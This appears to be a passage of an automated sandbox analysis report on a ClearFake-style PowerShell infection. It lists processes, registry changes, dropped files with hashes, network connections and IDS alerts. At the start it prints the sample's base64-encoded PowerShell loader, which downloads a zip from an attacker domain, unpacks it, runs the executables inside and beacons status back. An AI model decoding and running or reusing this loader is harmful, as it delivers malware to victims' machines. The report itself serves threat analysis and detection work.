AgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwByAHMAbQBiAHMAYwBtAC4AJABEAGMAUwAxAC8AcABvAHMAdAAuAHAAaABwAD8AcwB0AGEAdAB1AHMAPQAyACIACgAKACAAIAAgACAAJAB1AFIAbAAzACAAPQAgACIAaAB0AHQAcABzADoALwAvAHIAcwBtAGIAcwBjAG0ALgAkAEQAYwBTADEALwBwAG8AcwB0AC4AcABoAHAAPwBzAHQAYQB0AHUAcwA9ADMAIgAKAAoAUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AaQBtAHUAbQAgADMAMQAwADAAIAAtAE0AYQB4AGkAbQB1AG0AIAA1ADEAMAAwACkACgAKACAAWwBuAEUAVAAuAHMAZQByAHYASQBjAEUAUABvAEkAbgB0AG0AQQBuAGEAZwBFAFIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQBUAC4AUwBFAEMAdQBSAEkAdABZAHAAUgBvAHQAbwBDAE8ATAB0AFkAUABFAF0AOgA6AFQAbABzADEAMgAKAAoAIAAgACAAIAAgACQATQBpAG4AbABlAG4ARwBUAGgAIAA9ACAAOAAKAAoAIAAgACAAIAAgACAAIAAgACQAbQBBAFgATABFAE4ARwB0AEgAIAA9ACAAMQA1AAoACgAgACAAIAAgACAAIAAgACQATgBBAG0AZQBMAGUATgBnAHQASAAgAD0AIABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBNAGkAbgBpAG0AdQBtACAAJABNAGkAbgBsAGUAbgBHAFQAaAAgAC0ATQBhAHgAaQBtAHUAbQAgACgAJABtAEEAWABMAEUATgBHAHQASAAgACsAIAAxACkACgAKACAAIAAgACAAIAAgACAAJABDAGgAQQByAFMAIAA9ACAAJwBhAGIAYwBkAGUAZgBnAGgAaQBqAGsAbABtAG4AbwBwAHEAcgBzAHQAdQB2AHcAeAB5AHoAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABRAFIAUwBUAFUAVgBXAFgAWQBaADAAMQAyADMANAA1ADYANwA4ADkAJwAKAAoAIAAgACAAIAAgACAAIAAgACQARABJAFIAbgBhAE0AZQAgAD0AIAAtAGoAbwBpAG4AIAAoADEALgAuACQATgBBAG0AZQBMAGUATgBnAHQASAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABDAGgAQQByAFMALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAAfQApAAoACgAgACAAIAAgACAAIAAkAHQARQBNAHAAZABJAFIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAEUAbgB2ADoAVABFAE0AUAAgACIAJABEAEkAUgBuAGEATQBlACIACgAKACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJAB0AEUATQBwAGQASQBSACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoACgAkAFoASQBQAE4AYQBNAGUAIAA9ACAALQBqAG8AaQBuACAAKAAxAC4ALgAkAE4AQQBtAGUATABlAE4AZwB0AEgAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAQwBoAEEAcgBTAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAH0AKQAgACsAIAAnAC4AegBpAHAAJwAKAAoAIAAgACAAIAAgACQATwBVAFQAcABVAHQAUABhAFQASAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgACQAWgBJAFAATgBhAE0AZQAKAAoAJABoAEUAYQBEAGUAUgBzACAAPQAgAEAAewAgACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACAAPQAgACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAAMQAwAC4AMAA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwAwAHgAMQA3ADAAMAAwADAAMAAwACAAUwBhAGYAYQByAGkALwA1ADMANwAuADMANgAnACAAfQAKAAoAIAAgACAAIAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdABSAHUARQApACAAewAKAAoAIAAgACAAIAAgACAAdAByAHkAIAB7AAoACgAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATwBVAFQAcABVAHQAUABhAFQASAApACAAewAKAAoAIAAgACAAIAAgACAAIAAgACAAJABmAEkAbABFAGkATgBGAE8AIAA9ACAARwBlAHQALQBJAHQAZQBtACAAJABPAFUAVABwAFUAdABQAGEAVABIAAoACgAgACAAIAAgACAAaQBmACAAKAAkAGYASQBsAEUAaQBOAEYATwAuAEwAZQBuAGcAdABoACAALQBuAGUAIAAkAFIARQBTAHAAbwBOAFMAZQAuAEgAZQBhAGQAZQByAHMAWwAiAEMAbwBuAHQAZQBuAHQALQBMAGUAbgBnAHQAaAAiAF0AKQAgAHsACgAKACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMQAgAC0ATwB1AHQARgBpAGwAZQAgACQATwBVAFQAcABVAHQAUABhAFQASAAgAC0ASABlAGEAZABlAHIAcwAgACQAaABFAGEARABlAFIAcwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAKAAoAIAAgACAAIAAgACAAfQAKAAoAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKAAoAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAE8AVQBUAHAAVQB0AFAAYQBUAEgAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgARQBhAEQAZQBSAHMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAACgAKACAAIAAgACAAIAB9AAoACgAgACAAIAAkAGEAVABUAEUAbQBQAFQAUwAgAD0AIAAwAAoACgAgACAAdwBoAGkAbABlACAAKAAkAGEAVABUAEUAbQBQAFQAUwAgAC0AbAB0ACAAMgApACAAewAKAAoAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAewAKAAoAIAAgACAAIAAgACAAIAAkAHAATwBTAFQAcgBlAFMAUABvAG4AcwBFACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBMADIAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgARQBhAEQAZQBSAHMAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAKAAoAIAAgAGkAZgAgACgAJABwAE8AUwBUAHIAZQBTAFAAbwBuAHMARQAuAFMAdABhAHQAdQBzAEMAbwBkAGUAIAAtAGUAcQAgADIAMAAwACkAIAB7ACAAYgByAGUAYQBrACAAfQAKAAoAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAgACQAYQBUAFQARQBtAFAAVABTACsAKwAgAH0ACgAKACAAIAB9AAoACgAgACAAYgByAGUAYQBrAAoACgAgACAAfQAgAGMAYQB0AGMAaAAgAHsAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ACAAfQAKAAoAIAAgACAAIAAgACAAIAB9AAoACgAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAJABPAFUAVABwAFUAdABQAGEAVABIACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAAoAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyAAoACgAgACAAIAAgACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgAC0ARgBpAGwAdABlAHIAIAAqAC4AZQB4AGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAoAIAAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAAoACgAgACAAIAAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAuAEYAaQBsAGUATgBhAG0AZQAgAD0AIAAkAF8ALgBGAHUAbABsAE4AYQBtAGUACgAKACAAIAAgACAAIAAgACAAJABQAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMACgAKACAAIAAgACAAIAAgACQAUAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvACAAPQAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAKAAoAIAAgACAAIAAgACAAIABpAGYAIAAoACQAUAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdAAoACkAKQAgAHsACgAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AFIAbAAzACAALQBIAGUAYQBkAGUAcgBzACAAJABoAEUAYQBEAGUAUgBzACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACAAIAAgAH0ACgAKAH0ACgAKAH0ACgAKAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAuAEkAbgB2AG8AawBlACgAJABHAGMAcwAxACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAgAD0AIABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACcAZQB4ACcAKwAnAGkAdAAnACkACgAKACYAJABTAEMAcgBJAFAAVABiAEwAbwBDAGsACgAKAA== C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3972"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\ipconfig flushdns.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
4064"C:\Windows\system32\ipconfig.exe" /flushdnsC:\Windows\System32\ipconfig.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IP Configuration Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ipconfig.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\ws2_32.dll
Total events
13 289
Read events
13 191
Write events
98
Delete events
0

Modification events

(PID) Process:(3972) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3972) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3972) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3972) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3972) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2108) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2108) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2108) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2108) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2108) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
2
Suspicious files
12
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3972powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YWNUK74RWAQ46ZL9MZ2S.tempbinary
MD5:7B9FC8EDA8DFC3E128623081DB20030C
SHA256:81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED
3972powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF103450.TMPbinary
MD5:0268C3470C936E6FBAC2945B9E1C2099
SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
2108powershell.exeC:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\rhombohedron.aibinary
MD5:674DFD74A1BEF081BF0DA83F893138E5
SHA256:67FF95298E395543EA0C9EEEC6BFFF81688DF379BEC578AA31C52D214B385180
3972powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2108powershell.exeC:\Users\admin\AppData\Local\Temp\iaog00k5.3is.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2108powershell.exeC:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\hv.exeexecutable
MD5:480F8CF600F5509595B8418C6534CAF2
SHA256:6D8905EC0B1DFDC0A10D1CCE40714DDD73205A09AD390B933DDBECDCF06A4CF2
2108powershell.exeC:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\iepdf32.dllexecutable
MD5:F3F6876D132EB277842E31DDC42AA7FA
SHA256:4BA2DDDE8A4549D08BFE4441643AA626E84D7653B8DDC6ED61823E78AEB3CDF1
2108powershell.exeC:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\F1ZB8V9zrsso4.zipcompressed
MD5:665D5CB8BF03EA4637F8A1EB891237CC
SHA256:CA2B787BB72F0BD9D79013AA93800BFD84C73AAD74662C48E69425E4ADFB549B
2108powershell.exeC:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\shovelnose.debbinary
MD5:90B47672D8134F8CC464D83A5CDE8D34
SHA256:CC38B5CB522FDF8D2FE5E85C50D72E1B8AC39D36DEB157D4BFFDDA7970C5BA8B
2108powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:6675EDE59684F4A119D2E5DA282AFBE6
SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
10
DNS requests
4
Threats
8

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
3972
powershell.exe
172.67.75.40:443
rentry.co
CLOUDFLARENET
US
unknown
3972
powershell.exe
52.223.34.155:443
bsc-dataseed1.binance.org
AMAZON-02
US
unknown
3972
powershell.exe
104.21.76.71:443
rsmbscm.businessresources.ltd
CLOUDFLARENET
unknown
2108
powershell.exe
52.223.34.155:443
bsc-dataseed1.binance.org
AMAZON-02
US
unknown
2108
powershell.exe
172.67.75.40:443
rentry.co
CLOUDFLARENET
US
unknown
2108
powershell.exe
104.21.76.71:443
rsmbscm.businessresources.ltd
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
rentry.co
  • 172.67.75.40
  • 104.26.2.16
  • 104.26.3.16
unknown
bsc-dataseed1.binance.org
  • 52.223.34.155
  • 35.71.137.105
malicious
rsmbscm.businessresources.ltd
  • 104.21.76.71
  • 172.67.191.21
unknown
businessresources.ltd
  • 104.21.76.71
  • 172.67.191.21
unknown

Threats

PID
Process
Class
Message
1088
svchost.exe
Misc activity
ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
3972
powershell.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
3972
powershell.exe
A Network Trojan was detected
ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI)
1088
svchost.exe
A Network Trojan was detected
ET MALWARE DNS Query to ClearFlake Domain (businessresources .ltd)
2108
powershell.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
1088
svchost.exe
A Network Trojan was detected
ET MALWARE DNS Query to ClearFlake Domain (businessresources .ltd)
2108
powershell.exe
A Network Trojan was detected
ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI)
2108
powershell.exe
A Network Trojan was detected
ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI)
No debug info